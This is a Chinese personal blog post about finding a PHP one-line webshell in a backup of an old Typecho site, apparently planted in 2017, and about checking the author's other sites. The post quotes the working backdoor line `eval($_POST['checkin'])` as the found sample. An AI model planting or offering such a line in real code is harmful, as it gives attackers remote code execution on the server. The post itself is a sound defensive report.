Typecho网站竟然被放入了木马

前几天把网站从基于PHP的Typecho迁移到了基于Go语言的Hugo，从一个动态网站变成了一个静态化的网站了。我这人比较恋旧，于是把之前的数据备份一下，放在自己的网盘里，万一我有一天想不开又想用Typecho了呢？（应该没有这种万一）。于是打开了篱落主机的虚拟主机后台，使用DA面板作了一个备份，今晚老婆睡了，想把数据做个转移，于是Download下来，本来是解压一下看看下载文件是不是完整的，结果一解压，神奇的事情发生了。

这是个什么木马？

好家伙，电脑的安全软件直接报毒了，这Mac的安全软件我一直当摆设的，我心想这应该是这个软件误报了，于是想打开看看，结果竟然给我删除了，想看都看不了，这不能忍。于是转战Window平台，使用我的Win电脑再试试，结果正常解压了，火绒也没啥反应。打开看看是这样一段代码。

<?php @eval($_POST['checkin']);?>

相信稍微懂点PHP的应该都知道这是怎么回事，这就是著名的PHP一句木马，攻击者可以直接用POST请求上传任意PHP代码，让你的主机来执行。

什么时间植入的？

看了一下服务器中文件的时间，在2017年，应该是在我迁移篱落主机之前就已经被弄上了，可这么个玩意实话说也不是什么高级东西，看来是之前用的一些小主机厂商把我坑了。不过反正我这个站也不用Typecho了，直接7zip密码压缩封存了。

排查其他网站

于是把自己其他几个PHP的站也顺手备份和排查了一下，基本没这个问题，全局搜eval也只是Typecho官方的多语言实现中用了这么一个函数，看了一下代码，没什么大问题。如果你还在使用PHP的博客程序，注意这个问题哦。